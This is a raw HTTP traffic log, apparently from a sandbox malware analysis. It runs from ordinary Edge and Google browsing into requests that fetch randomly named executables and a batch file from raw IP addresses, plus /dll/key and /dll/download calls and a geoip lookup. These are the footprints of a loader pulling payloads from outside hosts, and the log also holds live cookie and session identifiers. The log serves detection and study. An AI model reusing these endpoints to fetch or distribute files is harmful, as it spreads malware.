Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.b70cb75853005ad9eaf6.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.55", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-full-version: "117.0.2045.55"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=88190A10AFE54D95A174CDC1E232E4AE.RefC=2025-02-07T16:46:53Z; USRLOC=; MUID=06240E757E776CC20BF51BF97F706D9A; MUIDB=06240E757E776CC20BF51BF97F706D9A; _EDGE_S=F=1&SID=3F2B3E8B6E4261810B1D2B076FC460D9; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.8ed343c804e9069b52b4.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.55", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-full-version: "117.0.2045.55"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=88190A10AFE54D95A174CDC1E232E4AE.RefC=2025-02-07T16:46:53Z; USRLOC=; MUID=06240E757E776CC20BF51BF97F706D9A; MUIDB=06240E757E776CC20BF51BF97F706D9A; _EDGE_S=F=1&SID=3F2B3E8B6E4261810B1D2B076FC460D9; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.f30eb488fb3069c7561f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.631ecbb4652e5615b96a.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.3341f078ea9822198c79.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=06240E757E776CC20BF51BF97F706D9A; _EDGE_S=F=1&SID=3F2B3E8B6E4261810B1D2B076FC460D9; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1738946819093&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=88190a10afe54d95a174cdc1e232e4ae&activityId=88190a10afe54d95a174cdc1e232e4ae&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=06240E757E776CC20BF51BF97F706D9A; _EDGE_S=F=1&SID=3F2B3E8B6E4261810B1D2B076FC460D9; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b?rn=1738946819093&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=06240E757E776CC20BF51BF97F706D9A&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1738946819093&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=06240E757E776CC20BF51BF97F706D9A&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1C88303efcdffc93e3af1e41738946820; XID=1C88303efcdffc93e3af1e41738946820
Source: global traffic	HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":34,"imageId":"BB1msG0W","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=88190A10AFE54D95A174CDC1E232E4AE.RefC=2025-02-07T16:46:53Z; USRLOC=; MUID=06240E757E776CC20BF51BF97F706D9A; MUIDB=06240E757E776CC20BF51BF97F706D9A; _EDGE_S=F=1&SID=3F2B3E8B6E4261810B1D2B076FC460D9; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=6ffedf24-4487-48ee-aa8c-da7ee7a24f85; ai_session=3oE2j2L068Hnjgdv6Kwl10\|1738946819085\|1738946819085; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=88190A10AFE54D95A174CDC1E232E4AE.RefC=2025-02-07T16:46:53Z
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 2.4sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.55", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-full-version: "117.0.2045.55"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=88190A10AFE54D95A174CDC1E232E4AE.RefC=2025-02-07T16:46:53Z; USRLOC=; MUID=06240E757E776CC20BF51BF97F706D9A; MUIDB=06240E757E776CC20BF51BF97F706D9A; _EDGE_S=F=1&SID=3F2B3E8B6E4261810B1D2B076FC460D9; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=6ffedf24-4487-48ee-aa8c-da7ee7a24f85; ai_session=3oE2j2L068Hnjgdv6Kwl10\|1738946819085\|1738946819085; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=88190A10AFE54D95A174CDC1E232E4AE.RefC=2025-02-07T16:46:53Z
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1738946819093&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=88190a10afe54d95a174cdc1e232e4ae&activityId=88190a10afe54d95a174cdc1e232e4ae&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CE8246FEF1EE4B0CAFF678DF5E30B4E5&MUID=06240E757E776CC20BF51BF97F706D9A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=06240E757E776CC20BF51BF97F706D9A; _EDGE_S=F=1&SID=3F2B3E8B6E4261810B1D2B076FC460D9; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sok33tn HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=ff0c59ac5d26287afc_5727703093009439738
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: vikine.restConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /files/6691015685/1VB7gm8.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/7788061076/L65uNi1.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/7788061076/af53YGc.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/1097348970/G8lVmiI.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/uniq.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/1415984330/MvowLGc.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/7788061076/af53YGc.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Thu, 06 Feb 2025 21:16:33 GMTIf-None-Match: "67a526b1-c6e00"
Source: global traffic	HTTP traffic detected: GET /files/7788061076/L65uNi1.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Thu, 06 Feb 2025 20:53:42 GMTIf-None-Match: "67a52156-c6e00"
Source: global traffic	HTTP traffic detected: GET /files/1097348970/G8lVmiI.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/uniq.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Thu, 06 Feb 2025 17:47:21 GMTIf-None-Match: "67a4f5a9-c7600"
Source: global traffic	HTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/6691015685/1VB7gm8.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Fri, 07 Feb 2025 10:42:01 GMTIf-None-Match: "67a5e379-1aec00"
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/1415984330/MvowLGc.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Fri, 07 Feb 2025 15:24:22 GMTIf-None-Match: "67a625a6-1c800"
Source: global traffic	HTTP traffic detected: GET /files/5801179114/5FheP4L.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/5801179114/5FheP4L.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Fri, 07 Feb 2025 16:18:20 GMTIf-None-Match: "67a6324c-222000"
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
